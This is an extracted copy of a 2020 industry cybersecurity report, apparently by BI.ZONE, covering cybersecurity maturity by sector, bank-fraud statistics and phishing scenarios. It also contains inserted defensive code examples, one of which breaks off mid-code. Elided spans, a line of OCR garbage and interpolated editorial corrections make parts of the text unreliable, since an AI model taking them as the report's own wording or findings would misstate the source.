Executive summary


[...] of certain markets, the economy as a whole or the socio-political climate. Over the years, the business community and state authorities have learnt to adapt to such situations.


For the time being, analysts should focus on exploring the risks of a potential cyber crisis, as its probability grows by the day. The destructive nature of such events [...] occurring disasters. Yet most companies (77%) are not at all prepared for such cases.¹



1. IBM study: more than half of organizations with cybersecurity incident response plans fail to test them // IBM Newsroom.

[Figure: The share of the Earth’s population using the Internet, 2005-2019 (number of Internet users on the left axis).]
The good news is that there are still ways to ensure protection against cyber crises. Sadly, these ways require continuous investment of resources and cooperation, and this goes [...] countries alike.


There is an ongoing discussion between research groups, academia and major [...] and national Computer Emergency Response Teams (CERTs) about the importance [...] exchange.
[...] world closer. According to the International Telecommunication Union (ITU), the number of Internet users has been increasing at a rate of 10% per year since 2005 and in 2019 reached an estimated 4.1 billion.
An effective cybersecurity strategy depends on several conditions, one of them being readiness for a cyber crisis, which is facilitated by a good understanding of current threats.

In the upcoming years, we are going to see two major factors play a vital role in shaping the future of cybercrime: insider threats and technological advances. No doubt the COVID-19 pandemic is radically changing our ideas of ‘normal’. The resulting economic [...] world to adapt to a new reality of remote work.
The many security incidents from 2019 serve as a stark reminder to everyone that when it comes to securing the external perimeter, it is crucial to be mindful of the risks posed by malicious insiders.


According to a survey, 69% of organisations associate data leaks with insider threats⁴ — you may remember some cases popping up in news feeds. One of them was last September, when Malindo Air had the data of 45 million passengers stolen by two employees working for a contractor company.⁵


Far from all companies are reliably protected from such threats, even within the cybersecurity industry itself: in February, Palo Alto Networks had the personal data of seven employees leaked onto the Internet due to a contractor error.⁶
5. Malindo Air says data leak caused by ex-staffers at contractor firm // Reuters.

6. 7 employees who worked at cybersecurity giant Palo [...] after a partner ‘inadvertently’ posted personal info to a website // Business Insider.
[Figure: Percentage of users with basic computer skills, 2014-2018. Source: ITU]


The human factor, however, is not always 
associated with malicious intent or errors 
in work: oftentimes a compromise may be 
attributed to a mere lack of cyber literacy. 


As reported by ITU, in 40 of the 84 countries where the data is available, less than 50% of the population has basic computer skills ([...]). The percentage of those who can perform more complex operations is even smaller.⁷


Such computer illiteracy points to a lack of even the most basic understanding of cyber hygiene. A good example here is the Lazarus attack on Redbanc, a Chilean company: the bank’s IT specialist opened malware disguised as [...] Redbanc’s corporate network.⁸
[...] comfortable, but they also present a plethora of new cybersecurity challenges.


The industry of IoT (smart kettles, refrigerators and other household devices connected to the Internet) has been evolving with a focus on [...] Such an approach has had a negative effect on these devices’ protection from intruders. As a result, hackers have access to billions of devices, which are currently being incorporated in bulk into the networks used for DDoS attacks.


[Figure: Global IoT malware attacks, 2018-2019, millions. Source: SonicWall]
[...] will be transmitted at a rate of 20 gigabits per second with a delay of up to 4 milliseconds¹⁰ (for comparison, LTE/4G supported up to 1,000 megabits per second with a delay of up to 20 [...] At the same time, the new generation networks are less centralised and rely less on hardware. This makes it more difficult to defend against attacks and respond to incidents.¹¹
[Figure: Frequency of AI use in cybersecurity tasks. Source: Capgemini Research Institute]


Biometric data is becoming increasingly popular for authentication: unlike a password, it does not require the user to memorise it, strictly [...] However, biometric recognition systems can be deceived, and if the biometric information of a particular user is compromised, it is very difficult to replace.¹²


Artificial intelligence (AI) has useful applications in almost every field, and especially in cybersecurity. It enables companies to automate and speed up multiple routine tasks: filtering spam, scanning the perimeter for vulnerabilities, collecting and processing big data about previous threats. [...] easily misused to help attackers create more advanced malware and credible phishing emails.¹⁴
14. Adversarial artificial intelligence: winning the cyber security battle // Information Age.

[...] // Markets and Markets.
The Security of Critical Information Infrastructure Act, passed in the Russian Federation in early 2018, has become an essential step towards enhancing cybersecurity in the key sectors of the Russian [...] in general.


[...] to start developing regulatory documents on the matter. Thus, in August of last year the Russian Ministry of Energy enforced a bill which mandates cybersecurity requirements to be approved when developing remote monitoring systems for energy services.¹⁷ Among other things, the document regulates the safe collection and storage of information in such systems; it also determines the necessary actions and defines the types of vulnerabilities and breaches to consider when building threat models.¹⁸


Nevertheless, it is obvious that the problem goes deeper than that. Protecting critical infrastructure is not enough to create a truly secure cyberspace. In a globalised world, an attack committed in a particular industry may result in cybersecurity incidents in other industries. Therefore, key area security requirements have to be applied at the federal level to all segments of the national economy.


17. Zaregistrirovan prikaz Minenergo Rossii utverzhdayushii trebovaniya k informatsionnoy bezopasnosti sistem [...] [Ministry of Energy order adopting requirements to the cybersecurity of the power supply remote monitoring systems has been registered] // Minenergo Rossii.

18. Prikaz Ministerstva energetiki Rossiyskoy Federatsii ot 06.11.2018 g. no. 1015 [Order of the RF Ministry of Energy no. 1015, date: 06.11.2018] // Rossiyskaya Gazeta.
Meanwhile, the issue of protecting personal data is still the prevailing factor in foreign cybersecurity acts and regulations.

On January 1, 2020, the California Consumer Privacy Act (CCPA) came into force. The legislation is in many respects similar to the GDPR, the General Data Protection Regulation enforced in the EU since May 2018. Under the CCPA, companies handling personal data [...] users about their data being collected and how it is shared. The act also gives users the opportunity to request information about themselves as well as to prohibit the sale of [...]

Cybersecurity experts in the US believe that similar legislation will be adopted in other states sooner or later.²⁰
[...] the reader about relevant cyber threats and the methods of protection against them. Also we [...] exchange incident-related data and work out [...] between companies, industries and countries can result in exclusive opportunities in dealing [...]

[...] be aware of one fact: if a single country or even company is unprepared for the cyber crisis, the [...] Cybercrime tends to step right over national borders, which means that the crises [...]
Cybersecurity maturity across industries


Consider the largest national airline or the organiser of the most important football competition in the world, an innovative school or a food delivery service... At first glance, these companies seem to have nothing in common. However, BI.ZONE’s experience shows that, in fact, they do: they all strive to provide an adequate level of cybersecurity (hereinafter referred to as CS).
Each company has its own understanding of ‘adequate’ when it comes to CS. For some, it is enough to simply develop basic documentation to ensure formal compliance and avoid punitive sanctions from the regulator, while others see the importance of keeping up with the introduction of modern technological solutions capable of effectively resisting cyberthreats.


In the end, everything depends on CS maturity, i.e. the current maturity level of CS processes, planned budgets, top management involvement and many other factors.




Our projects have allowed us to accumulate a lot of information about the level of CS maturity in different organisations. For Threat Zone 2020, we have generalised this data, and the result is an industry comparison of CS maturity.
Scope and method


What companies we 
compared 


We sampled companies from the following 
seven industries: healthcare, media and 
e-commerce, transport, finance, retail, 
telecommunications and IT. 


Our respondents included Russian and foreign organisations whose CS systems we had previously audited. Altogether, the study involved the statistics of 152 companies that have been accumulated by BI.ZONE since 2018.


We had no intention to categorise companies 
by size for this study. For instance, the IT 
industry sample included mostly start-ups 

and small companies, while the transport 
industry ranged up to some of the largest 
national operators. We did not consider this as 
a relevant feature for the comparison since our 
observations show that the size of business is 
not always related to its level of CS maturity. 
How we compared the companies


The analysis was based on a comprehensive 
framework developed by BI.ZONE on the basis 
of its own experience and the best global CS 
practices. 


This framework gives structured criteria for assessing CS maturity in 12 domains which are considered to be the most relevant and fast-growing in the expert community:


1. Cybersecurity Governance.
2. Cybersecurity Awareness.
3. Asset Management.
4. Information System Access Control.
5. Physical and Environmental Security.
6. Operational Technology Security.
7. Communications Security and Third-Party Management.
8. Incident Handling and Response.
9. Recovery and Continuity.
10. Compliance and Data Privacy.
11. Cryptography.
12. SSDLC — Secure Software Development Lifecycle.
How we presented the results


We assessed the sampled companies by each 
of the mentioned framework domains and 
produced a fair evaluation of the level of their 
CS maturity. 


After comparing all evaluations, we calculated 
an overall CS maturity level for each industry. 
The results are shown in the diagram below. 


In quantitative terms, the values vary from 0 to 
5, where 5 shows that the CS processes in the 
company are measurable, constantly improved 
and compliant with the best global practices, 
while 0 shows that there are no CS processes 
at all and no effort is being made in that 
direction. 


Values for each domain of the framework are 
given in the corresponding parts of the Results 
section. 


Other data obtained 


For some aspects of CS, we calculated indicators that can be applied to the entire market. These indicators are presented in percentage values.
How this information helps


Hopefully, the information presented in this 
chapter will help companies answer questions 
about their own CS maturity: ‘Where do we 
stand among our competitors?’ and ‘What 
direction should we take next?’ Being aware 
of these can give a company a substantial 
boost in profitability and market presence. 


Using our framework, you can quickly assess 
the current level of your CS maturity and 
choose where to focus your effort. 
Results


Cybersecurity Governance 


This area involves the conceptual aspects of CS management and addresses such issues as: how a company integrates CS with the strategic tasks of its business, whether management is properly informed about the importance of CS, what principles are followed when allocating resources and how risks are evaluated, etc. In other words, these are the issues that express a company’s intentions in the field of CS and precede all other decisions.


The vital nature of CS management seems to need no explanation, especially in light of the losses and risks that can arise from insufficient CS programme development. For instance, the average total losses incurred by companies as a result of data leaks amounted to $3.92 million in 2019.¹


In reality, the C-suite rarely takes any interest in cybersecurity. According to our statistics, only 54% of companies have their CS-related meetings attended by management on a regular basis.


So, when comparing CS maturity by industry, we can see that the industries where management is most involved in CS are financial and e-commerce organisations. This is quite natural, since these industries suffer the most from cyberattacks; therefore, top management in these companies cannot afford not to care about the security of clients’ data and company reputation.


First of all, companies should rely on the risk-oriented approach. It is not a good idea to implement CS products just because they are considered modern or in fashion, or because a vendor advertises a package of so-called ‘unique solutions’ at an attractive price. It is vital to start with the assessment of CS risks to select an adequate approach in mitigating them.


Secondly, managers should take a more active part in solving CS-related problems. It is not enough to hire in-house experts or to outsource this responsibility. Company managers must show keen interest, take on leadership and display commitment to the CS management system.
Cybersecurity Awareness


Contemporary cyberthreats mostly exploit the human factor — phishing and social engineering are responsible for 90% of bank frauds, which we discuss in the chapter ‘Cybersecurity in numbers’. Businesses lose $17,700 each minute due to phishing attacks.²













A company's security depends largely on the 
actions of its employees. The understanding 
of such risks encourages many organisations 
to invest in basic CS awareness training and 
regular testing. 








2. The evil Internet minute 2019 // RiskIQ.


According to our data, 38% of companies pay 
no attention to cyberthreat awareness among 
their staff. 


An industry comparison shows that retail stands out in this domain, as companies in this sector tend to systematically neglect digital hygiene training for their personnel, relying solely on corporate information protection systems.


It is reckless to ignore the importance of the human factor. The number of social engineering attacks is only going to rise in the future, since it is much easier to compromise a credulous user than to bypass a professionally built security system.


That is why we consider it crucial that company 
managers realise, once and for all, that people 
play a key role in the security of their company, 
rather than technical measures or documented 
policies. 


We also recommend the following:

- assessing risks and losses related to possible attacks through employees;

- performing regular in-person or online CS training for employees;

- simulating attacks on employees every few months using realistic phishing letter templates and relevant scenarios, then evaluating their reaction to such attacks.
Asset Management


About the domain 


Assets mean all objects that process business-sensitive information, such as servers, laptops, computers, smartphones, flash drives, system or application software and, of course, the information itself.

The goal of asset management is to determine the company’s information assets and develop models to protect them. This should cover the entire asset lifecycle, not just their active operation. As a Stellar study shows, about 71% [...]
In terms of asset management, the leaders in the domain are companies from the financial sector, transport, retail, media and e-commerce. BI.ZONE attributes this to the availability of resources and the efforts to reduce business risks in cyberspace. In financial organisations, there is another stimulating factor: strict regulation. In the financial sector, we can see that the processes of classification and labelling of information are well established, assets involved in processing sensitive data undergo regular stock control procedures, and their owners and users carefully follow corporate CS policies.


On the other hand, these aspects are still underdeveloped in IT companies. This is caused by the competitive drive to focus on the development of unique and necessary product features and to put boring CS matters aside for later.


First, organisations should be fully aware of what information falls within the scope of the requirements of regulators, what information defines the company’s success in the market and should be considered confidential, and what information can be shared with clients at an international congress or with friends over a cup of tea.


Second, organisations should conduct stock 
checks of assets that process this information 
and regularly update the list of persons 
responsible for these assets. 


Third, organisations should set procedures in place for handling data storage devices, including the management of removable media and the control of their relocation and reliable disposal.
Information System Access Control


This domain is a fundamental component of CS. It makes it possible to efficiently prevent unauthorised access to information resources and is founded primarily on three As: authentication, authorisation and audit.


Problems encountered within the scope of this domain are often related to obsolete approaches to access control. For instance, although the login-password combination was declared unreliable by the expert community a long time ago, many companies still actively use it for authentication. Even though more advanced solutions (SMS authentication, etc.) are not much more expensive, they are mostly not introduced because people are too accustomed to the old ways.


If further neglected, this domain can end up in the situation described in Varonis research. According to the study, 53% of organisations found that more than 1,000 of their confidential documents could be accessed by any of their employees.⁴




4. 2019 Varonis global data risk report // Varonis. 
Authentication is required to gain access to the system. At this stage, the system ensures that access is really demanded by John Doe rather than someone who pretends to be him. To confirm their identity, users provide unique passwords, fingerprints, electronic signatures, etc.

Authorisation is required to perform specific actions in the system, for instance, to open, modify or delete documents. At this stage, the system checks whether the user has the necessary rights to perform the corresponding actions.

Audit is introduced to monitor system events, such as attempts to log in, to access files or to make modifications. In case something goes wrong in the system or an incident occurs, the audit trail makes it possible to open the event log and identify the problem.
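The three As described above, as an added example that is not from the report: a small Python module that authenticates users against salted PBKDF2 password hashes, authorises actions by role, and records every decision, allowed or denied, in an audit log that can be queried after an incident. The user store, roles and document names are constructed for illustration.

```python
import hashlib
import hmac
import secrets
import time

# Constructed role model (an assumption for this example): role -> actions it may perform.
PERMISSIONS = {
    "employee": {"open"},
    "editor": {"open", "modify"},
    "admin": {"open", "modify", "delete"},
}

# Constructed in-memory user store: username -> credential record and role.
USERS = {}

# Audit trail: one entry per authentication or authorisation decision, success or failure.
AUDIT_LOG = []


def hash_password(password, salt=None, iterations=100_000):
    """Derive a PBKDF2-HMAC-SHA256 digest. Only salt and digest are stored, never the password."""
    if salt is None:
        salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return salt, digest, iterations


def add_user(username, password, role):
    salt, digest, iterations = hash_password(password)
    USERS[username] = {"salt": salt, "digest": digest, "iterations": iterations, "role": role}


def audit(event, user, detail, ok):
    """Audit: record who tried what, on which resource, and whether it was allowed."""
    entry = {"ts": time.time(), "event": event, "user": user, "detail": detail, "ok": ok}
    AUDIT_LOG.append(entry)
    return entry


def authenticate(username, password):
    """Authentication: verify the caller really is `username`. Returns a session or None."""
    record = USERS.get(username)
    if record is None:
        # Hash anyway so an unknown user costs about as much time as a wrong password
        # and the response time does not reveal which usernames exist.
        hash_password(password, b"\x00" * 16)
        audit("login", username, "unknown user", False)
        return None
    _, digest, _ = hash_password(password, record["salt"], record["iterations"])
    # Constant-time comparison so the stored digest is not leaked byte by byte through timing.
    if not hmac.compare_digest(digest, record["digest"]):
        audit("login", username, "bad password", False)
        return None
    audit("login", username, "ok", True)
    return {"user": username, "role": record["role"], "issued": time.time()}


def authorise(session, action, resource):
    """Authorisation: does the session's role permit `action` on `resource`? Always audited."""
    allowed = action in PERMISSIONS.get(session["role"], set())
    audit(action, session["user"], resource, allowed)
    return allowed


def open_document(session, doc_id):
    """A guarded operation: authorisation is checked before anything is returned."""
    if not authorise(session, "open", doc_id):
        raise PermissionError(f"{session['user']} may not open {doc_id}")
    return f"contents of {doc_id}"


def delete_document(session, doc_id):
    if not authorise(session, "delete", doc_id):
        raise PermissionError(f"{session['user']} may not delete {doc_id}")
    return True


def denied_events(log=None):
    """What an investigator pulls from the trail after an incident: every denied attempt."""
    log = AUDIT_LOG if log is None else log
    return [(e["user"], e["event"], e["detail"]) for e in log if not e["ok"]]


# Constructed sample accounts.
add_user("john.doe", "correct horse battery staple", "employee")
add_user("jane.admin", "a-different-long-passphrase", "admin")
```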
First prize in identity and access management inside information systems goes to the financial sector. This is no surprise, given the requirements of regulators and the banks’ own desire to keep their client data safe.


To increase the maturity level in this CS domain, 
we advise the following: 


- consider using rigorous authentication 
mechanisms (at least for business-critical 
information systems); 

- use Identity Management systems; 

- keep an eye on administrators and other 
privileged users who have unrestricted 
access to sensitive data. 
Physical and Environmental Security


Physical access control appeared even before the concept of cybersecurity. It was designed to minimise the most expensive risks. For example, thefts committed by employees cost their companies $50 billion every year in the USA.⁵


Conventional measures are pretty good for solving tasks in this domain. Therefore, physical security is one of the most conservative components of the CS system. Very few changes occur in the domain. Once introduced, solutions work well, while innovations, such as biometric access control systems, would mean unjustified expenses for most companies.


5. Employee theft statistics // Statistic Brain Research Institute.
It should also be noted that although access control in organisations usually complies with the requirements of best practice in this field, their control of internal movement cannot be called strict. Yet this is important when it comes to the security of servers and equipment processing sensitive information.
A good level of maturity in physical security was observed amongst companies in e-commerce, transport and finance. For these companies it is customary to keep the equipment separate from personnel, in dedicated data centres. It is a good practice since data centres are built in accordance with the operational sustainability requirements (TIER) and are known for the high-quality access and relocation control.


First and foremost, we recommend paying more 
attention to control of the access to internal 
areas of the company. 


When possible, we recommend considering 
keeping information systems in a data centre 
that complies with at least TIER 3 requirements. 
This will ensure integrity of equipment that 
processes sensitive information. 
Operational Technology Security

CS maturity does not mean isolated actions and one-time attention to an encountered problem, risk or incident. Maturity is achieved by the continuous repetition of actions that ensure the security of networks, computer systems and apps and keep them accessible by:

- controlling applied software;

- monitoring events in the corporate network;

- making backup copies for system recovery in case of an incident;

- searching for and patching vulnerabilities in the infrastructure, etc.

A banking trojan is a type of [...] money from users. This malware aims to gain access to the victim’s bank account or cryptocurrency wallet.




This set of measures defines operational 
security. 


Operational security is based on the understanding that being protected yesterday does not mean you are protected today. For instance, experts have been familiar with banking trojans as a class of malware for a long time. If the protective measures developed against them had remained effective, the number of trojan infections would have decreased over time. However, in the first half of 2019, this type of malware attacked 7% more individual and corporate users than over the same period of the year before.⁶
The lowest level of maturity in operational security is shown by IT and retail. Representatives of these industries prioritise the results of business activities and tend to pay little attention to the processes that support these very activities.


To maintain a high level of operational technology security, we recommend:

- ensuring control of modifications in the infrastructure;

- ensuring monitoring of and timely response to security incidents;

- ensuring proper management of software installation;

- conducting information backup procedures;

- following vulnerability identification and patching procedures;

- taking adequate measures for protection against malware.


Communications Security and Third Party Management

About the domain

Data leaks can be caused not only by a weak security system, but also by an underdeveloped model of communication with contractors.




This was the reason why 540 million Facebook accounts ended up in public access. It started with Facebook hiring a contractor to develop one of its apps. The contractor, as it turned out, had serious vulnerabilities in its system security. The server which the contractor used to store Facebook user databases was accessible to anyone from the Internet and did not even require a password.⁷


Security of communication with contractors is just one component of this CS domain. It also involves matters related to the security of data transfers via telecommunication channels. Throughout our projects, we encountered numerous situations when the endpoints of a particular organisation were secured, but there was a high likelihood of leaks when data was transferred outside the corporate network.
The level of maturity in this CS domain is below average in almost all the industries tested. Moreover, leaks of commercial secrets and personal data are bound to occur, since businesses do not take into account the risks associated with data leaving the corporate network.


First, we recommend that companies 
thoroughly monitor compliance with CS policy 
in relations with vendors. 


Second, we recommend ensuring control 
of network access and secure transfer of 
sensitive information between all stakeholders 
both at the organisational and technical levels. 


Finally, if a business needs to grant system access to a third-party organisation, we advise doing a preliminary risk assessment to understand possible outcomes and to set the requirements for CS management activities. In our opinion, the most effective way to determine such measures is to stipulate them in contracts with third parties.


[Figure: Assessment of Communications Security & Third-Party Management by industry (Finance, Healthcare, Telecom, Retail, IT, Media/E-commerce, Transport), on the 0 to 5 scale.]


J) 
2 
ra) 
a) 
6) 
J) 
x< 
LL 




Incident Handling and Response

All companies aim to prevent CS incidents within their infrastructure. But when companies focus too much on prevention, they fail to consider the possibility of such incidents actually occurring. In contrast, organisations with a mature level of cybersecurity plan in advance:

- how, in case of an incident, to recover normal functioning of business services in accordance with client expectations and obligations to counterparties;
- what actions will be required to minimise the adverse effects of an incident.

In this CS domain, planning should be based on 'when', rather than 'if', a scenario will happen. This is only logical, since cybercriminals have become increasingly active and more companies have faced digital attacks. In 2019, the number of attacks exceeded that of 2018 by 19%; in 81% of cases, the victims were legal entities.[8]

[Callout: annual growth of the number of cyberattacks]

Criminals mostly attack government bodies, industrial enterprises, medical institutions, as well as financial, research and educational organisations.[8]


8. Aktual'nye kiberugrozy: itogi 2019 goda [Relevant cyberthreats: 2019 in review] // Positive Technologies.

Market analysis


We noted that the aspects of incident handling and response are well developed in all industries, which means that companies understand why ignoring this CS domain can be dangerous. The best results were demonstrated by the finance and e-commerce industries, which are heavily influenced by regulatory requirements.

Recommendations

Establishing a Security Operations Centre (SOC) is the most effective way to ensure a mature response to CS incidents. To organise a SOC, a company can either use its own resources or outsource this function to a CS vendor.

If such a measure is not economically feasible, we recommend launching a cyber incident handling process based on the best global practices. Good sources are the ISO and NIST standards on incident management (ISO/IEC 27035 and NIST SP 800-61 are the relevant ones) and the industry requirements of regulators.
Business Recovery and Continuity

About the domain

When companies face difficult times, their first priority is to ensure the continuity of their processes.

Companies often experience situations the outcome of which depends on the maturity of this CS domain. In the past two years, at least 40% of Russian companies faced major incidents that interrupted critical business processes for over 4 hours.

[Callout: share of companies unable to ensure stable business processes in case of failures in their IT infrastructure; the figure did not survive extraction]
Despite the obvious importance of this process, our statistics show that most companies are not prepared for emergency recovery:

- 83% of companies have no detailed recovery plans to maintain business continuity and recover business processes, infrastructure and applications;
- 20% of corporate infrastructures are unable to ensure the projected level of service in case of failures.

Our industry analysis shows that financial companies have the most developed business continuity practices. This is not surprising, since split seconds can cost millions in this field, and financial organisations are under strict supervision by the regulators.

Business continuity and recovery has become an increasingly pressing issue for both small and large companies. The events that the international community has recently faced (the emergency measures for combatting COVID-19, the growth of unemployment and the resulting financial crisis) have made organisations re-evaluate the importance of being able to respond to critical situations in a timely manner.

According to our forecasts, within the next two years companies on the global market will prioritise the implementation of continuity maintenance and disaster recovery processes, including scenarios in which access to workplaces is limited.

Despite the labour intensity and high complexity of this work, we recommend that all organisations define measures that will allow them to ensure continuity at least for their critical systems. A recovery plan that has never been exercised is of little value: recovery time and recovery point objectives should be tested against the critical systems, not just written down.
Compliance and Data Privacy

Every year, more new requirements appear for companies in the market to comply with.

Although many companies have not yet recovered from the stress and costs of complying with Federal Law No. 152-FZ 'On personal data', Russian and global regulators have developed new and more comprehensive cybersecurity and privacy requirements, such as the following:

- 187-FZ for critical information infrastructure;
- GOST R 57580 for financial organisations;
- the General Data Protection Regulation (GDPR) for those who process the personal data of individuals in the EU (it applies to data subjects located in the EU, not only to EU citizens);
- CCPA for the protection of the personal data of California residents.

Failure to comply with the requirements would cost companies dearly. The largest GDPR fines announced in 2019 make it clear why it is so important to conduct timely CS audits and fix the deficiencies. For example, British Airways faced a fine of €204.6 million, and Marriott International, the international hotel franchise, a fine of €110.4 million. (Both figures are the amounts the UK ICO announced in its 2019 notices of intent; the penalties finally imposed in 2020 were substantially reduced, to £20 million and £18.4 million respectively.)
According to our statistics, 38% of companies do not conduct CS audits on a regular basis, and more than 85% of companies have not assessed the applicability of GDPR requirements to their business processes.

However, it should be noted that maturity in the compliance domain is rather high on average across the industries. Media/e-commerce companies are the leaders in this field, mostly due to the availability of resources for regular compliance audits as well as thorough inspection by regulators.

We expect that compliance will remain the top-priority objective for international business over the next three years.

CS has become more and more grounded in the risk-oriented approach, which dictates that all decisions should depend on the individual risks of a company. Even so, regulatory requirements for business are not going to be lifted any time soon. On the contrary, new regulations appear every year (Quick Payments System, Unified Biometric System), and industry regulators keep broadening the set of their rules.

That is why we recommend that companies determine the legislative requirements applicable to them, audit their compliance, and take as many measures as possible to close the gaps found.
Cryptography

As the digital economy grows, businesses are starting to rely more on the public segment of the Internet to transfer and even store all the data necessary for work, including sensitive corporate information and clients' data.

In these conditions, the principal technical method of protecting that information is encryption. According to research by McKinsey & Company, 84% of companies that use cloud services are considering encryption of their cloud-stored data.

Cryptographic methods of protection are used not only for data transfer, but also for user authentication and authorisation. For instance, they are the basis of the digital signature mechanism.

Non-repudiation is a great advantage of these methods: a valid signature can only have been produced by the holder of the private key, which a symmetric MAC shared between two parties cannot prove. This became evident from recent events, when half of the world switched to remote work due to the COVID-19 pandemic. As a consequence, it has become difficult to use paper documentation, legal or otherwise. We are sure that digital signatures are about to develop rapidly in Russia and other countries.
Experience shows that companies mainly use cryptography to protect data in transit over public communication channels, and large organisations also use it in their internal document flow systems. The financial sector also uses cryptographic keys to conduct financial operations; this explains why its maturity level in this domain is higher than that of the other industries.

However, as we can see from the statistics obtained, there are still areas for growth. For instance, most companies have no fully regulated scenarios for applying cryptography and no policies in the field of cryptographic protection of information. Moreover, they place the responsibility for generating and handling cryptographic keys on a single employee, which makes that person both a single point of failure and an uncontrolled insider risk; key custody should be subject to dual control and separation of duties.

The most important measure for developing this domain is to shape and introduce policies on cryptographic protection of information in the company.
SSDLC — Secure Software Development Lifecycle

The SSDLC concept covers the security issues related to the development and introduction of new software into the company's infrastructure. SSDLC helps to integrate such security measures as penetration testing, code analysis and architecture analysis into product lifecycles.

Our audits show that it is not enough to hire top-class developers who understand why programs become hackable and how to prevent it. SSDLC is always about a comprehensive approach to the development process. It is important to arrange SSDLC in such a way that CS measures do not slow down the business, and at the same time that no critical vulnerability gets into the final version of a product.

SSDLC allows a company to avoid reputational damage and the large cost of patching a product that is already in use. The value of finding a flaw before it is public is illustrated by the Microarchitectural Data Sampling (MDS) class of vulnerabilities detected in Intel CPUs, which allow an attacker to leak data from internal CPU buffers across security boundaries. Thanks to the early detection of the vulnerabilities and coordinated disclosure, Intel engineers, together with software developers, had time to prepare mitigations before the details were published.[12]

12. Intel ZombieLoad flaw forces OS patches with up to 40% performance hits // VentureBeat.
Our study showed that transport, financial and media companies take the introduction of SSDLC procedures more seriously than others. The causes may differ in each particular sector. In finance, it is the large number of regulatory requirements. In transport and media, it is a strong business dependence on their own products and services, as well as strict requirements for the quality of their work.

[Figure: Assessment of SSDLC, maturity score by industry (Finance, Healthcare, Telecom, Media/E-commerce, Transport); the values did not survive extraction]

We recommend engaging external CS specialists, since they can perform an audit of the development process and help implement the necessary processes with all aspects of the regulatory framework taken into consideration.

If it is economically unfeasible to engage third-party experts, we recommend following the industry requirements, standards and best practices in the field of secure system development, such as ISO/IEC 27034, Microsoft SDL and the OWASP secure SDLC guidance.
Financially motivated attacks are connected with banks one way or another. Adversaries try to steal money either from financial institutions or from their clients. This chapter describes the results of a study of cyber thefts involving Russian banks and their clients' accounts. The chapter also contains information about the victims and the criminals, as well as the types of fraud and their geographical spread in 2019.

We have also included figures obtained from penetration testing of our clients. We have identified which security flaws are most frequently encountered in different types of corporate infrastructure and web applications. The chapter also presents analytical data based on the results of phishing simulations conducted inside companies.
Victims and attackers: the profile

There has been a slight increase in the average age of cybercrime victims. In 2018, the most affected demographic was clients under 35 years of age. However, in 2019, the 35-44 age group almost caught up with the 20-34 age range.

[Figure: victims by gender: 55% male, 45% female]

The average age of attackers has not changed, with most being 25 to 34 years old. 34% of all fraudulent bank cards were issued to people from this age group.

[Figure: attackers by gender; the percentages did not survive extraction]
Attacks on accounts

Most attacks on client accounts are performed using social engineering. In most cases, victims themselves willingly transfer money to the adversary. The usual scam involves fake messages about card blocks or attempted withdrawals.

The scale of criminal activity in this segment is impressive. Such groups even organise their own call centres. They hire full-time employees whose sole purpose is to deceive bank clients and steal their money. In such cases, leaks of personal data and client information are of great value to fraudsters: when you know a person's name, loan amount and home address, it is much easier to convince them that you are an employee of their bank's security department.


Types of fraud 


Attackers keep exploiting human credulity. In 2019, 90% of the 
money stolen from bank clients was appropriated using social 
engineering techniques. Compared to 2018, the share increased 
by 10 percentage points. 


At the same time, the share of malware attacks decreased from 
9% to 3%. 


Social engineering channels 


Figures demonstrate that attackers prefer the phone to other 
communication channels. In 90% of all social engineering 
scams of 2019, the adversaries chose to call their victims. 


The share of fraudulent text messages dropped significantly 
from 33% to 5%. Other communication means were used even 
less frequently. 
Funds withdrawal

Theft channels by number of transactions

In the past, fraudulent bank cards and SMS banking were the main tools for stealing money. In 2019, the situation changed, and mobile app scams took the lead: such operations constituted 50% of the total number.

Bank cards are in the middle with 30% of the total number of transactions.

At the same time, SMS banking has dramatically lost popularity among adversaries and now accounts for just 12%. For more details about these changes, see the chapter Attacks on individuals.
Theft channels by stolen amount

When we sort the channels by the amount of stolen money, the shares of bank cards and mobile apps are almost equal: 42% and 43% respectively.

Stolen funds withdrawal channels

The most common channel for withdrawing stolen money in 2019 was various web services (65%). These included services for purchasing goods, services or bonds via the Internet.

Bank cards held second place among the most common withdrawal methods (21%).

Geographic spread of fraudulent bank cards

Most fraudulent cards are issued in Moscow (12%). Second place is shared between St. Petersburg, Rostov and Sverdlovsk regions (6% each).

In 2019, we saw a decrease in the use of malware to steal money from ATMs: the share of such cases dropped to 0%. The same happened to Black Box attacks (using a specialised hardware device to extract cash from an ATM). At the same time, the share of physical break-ins into ATMs increased: this method was used in 63% of cases.

[Figure: ATM attack methods, 2019; break-in 63%]
Corporate vulnerabilities study

This part presents the analytical data we gathered while conducting penetration testing. Every year, BI.ZONE tests the security of dozens of companies from different industries, so we have a lot to tell.

First, we will discuss the statistics on simulated phishing attacks and describe the standard scenarios used by attackers. We will discuss how regular training leads to a significant increase in employees' resistance to socio-technical attacks.

The second part of the section describes infrastructure and application security inside companies. We will look at the assets that are prioritised by businesses and the assets that remain poorly protected. We will also discuss the most frequently encountered dangerous vulnerabilities of 2019 and what a potential attacker can achieve by exploiting them.

In the third part, we will discuss the process-based approach to securing a company's external perimeter and the tools that can help. We will share our three years' experience with automated vulnerability scanners and give recommendations regarding their use.

Phishing training

Most frequently, real attackers use phishing to gain access to valuable company assets. The attacker pretends to be a trusted party, e.g. a mail service or a bank, and tries to obtain either users' confidential data or the means to access it.

We test our clients' resistance to such attacks by conducting simulated phishing campaigns. The figures show that such drills are helpful in preparing employees for actual attacks, but only if performed on a regular basis.
We have identified two major scenarios involving phishing letters.

Malware launch

The user receives a letter with an attachment. In most cases, it is a Microsoft Word document that presumably contains important information (a contract, a payment order, a commercial offer, etc.). This file contains a macro, a program written in Visual Basic for Applications. Such programs are normally used to automate routine tasks in MS Office products, but attackers use this tool for their own purposes. They place malicious code in a macro; it runs with the privileges of the user who opened the document, which gives the attackers a foothold in the system from which to proceed with the attack. To reach their goal, all they need is to make the user enable the macro in the attached document.
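As an added example for this edition (not code from the report or from BI.ZONE), the block below shows the kind of attachment check a mail gateway can apply to the first scenario: it inspects a Word attachment as an OOXML package and flags the presence of a VBA project, both by the part name and by its registered content type. The sample documents are constructed in code, so the check runs offline; the `build_sample_document` helper and the verdict strings are assumptions of the example.

```python
import io
import zipfile

# Content type that Office registers for the VBA project part inside a
# macro-enabled OOXML package (.docm, .xlsm, ...).
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"


def build_sample_document(with_macro: bool) -> bytes:
    """Constructed minimal OOXML package for the demo: not a real Word file,
    just enough of the package structure for the detector to work on."""
    types_xml = (
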